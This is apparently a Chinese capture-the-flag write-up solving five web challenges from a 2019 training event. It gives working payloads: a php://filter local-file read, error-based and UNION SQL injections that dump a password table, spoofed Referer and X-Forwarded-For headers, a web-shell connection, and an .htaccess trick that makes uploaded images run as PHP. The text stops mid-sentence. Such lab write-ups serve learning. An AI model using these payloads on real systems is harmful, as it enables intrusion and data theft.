[极客大挑战 2019]Secret File
打开题目检察源码,找到了一个文件
然后就是一个按钮,点击后,他应该是反应了,但是我们看不到
那我们抓包看看,这里是Burp抓包后,发到重发器发送了一遍,看看响应包,发现了
然后访问这个网页就是一个源码
这里没有过滤php://filter- ?file=php://filter/read=convert.base64-encode/resource=flag.php
复制代码 base64解密后得到flag
[极客大挑战 2019]LoveSQL
先用全能账号暗码试试,乐成登录
登陆进去没啥用,可能藏在数据库了,这次我们用报错注入,因为我试了,他会有报错语句
爆库名- 1' and extractvalue(1,concat(0x7e,(select database()),0x7e))or '
复制代码
爆表名- 1' and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='geek'),0x7e))or '
复制代码
先爆这个love这个表里面的列,毕竟他和题目一样名字- 1' and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='geek' and table_name='l0ve1ysq1'),0x7e))or '
复制代码
然后爆数据(我觉得我挺傻逼,我爆到第15行才有flag,纯手搓)- 1' and extractvalue(1,concat(0x7e,(select password from l0ve1ysq1 limit 15,1),0x7e))or '
复制代码
然后我发现死活得不到后半段,只要一看16行就报错,我也是不懂了,所以最后我就正常得到数据的- 1' union select 1,2,group_concat(password) from l0ve1ysq1#
复制代码
[极客大挑战 2019]Http
打开题目发现是卖鞋厂,我也是慌了,看看源代码有没有信息吧
找到了,那我们就访问一下
抓包开搞:
说我不是这里来的
- Referer:https://Sycsecret.buuoj.cn
复制代码 又提示不是这个欣赏器
又提示不是当地访问
- X-Forwarded-For:127.0.0.1
复制代码 总的请求头就是这个:
拿下flag:
[极客大挑战 2019]Knife
蚁剑直接连接
根目次找到flag
[极客大挑战 2019]Upload
这道题就是我发现可以上传.htaccess文件
所以这里我就抓包上传- <IfModule mime_module>
- SetHandler application/x-httpd-php
- </IfModule>
复制代码
然后开始上传图片马
这道题过滤了 <strong> |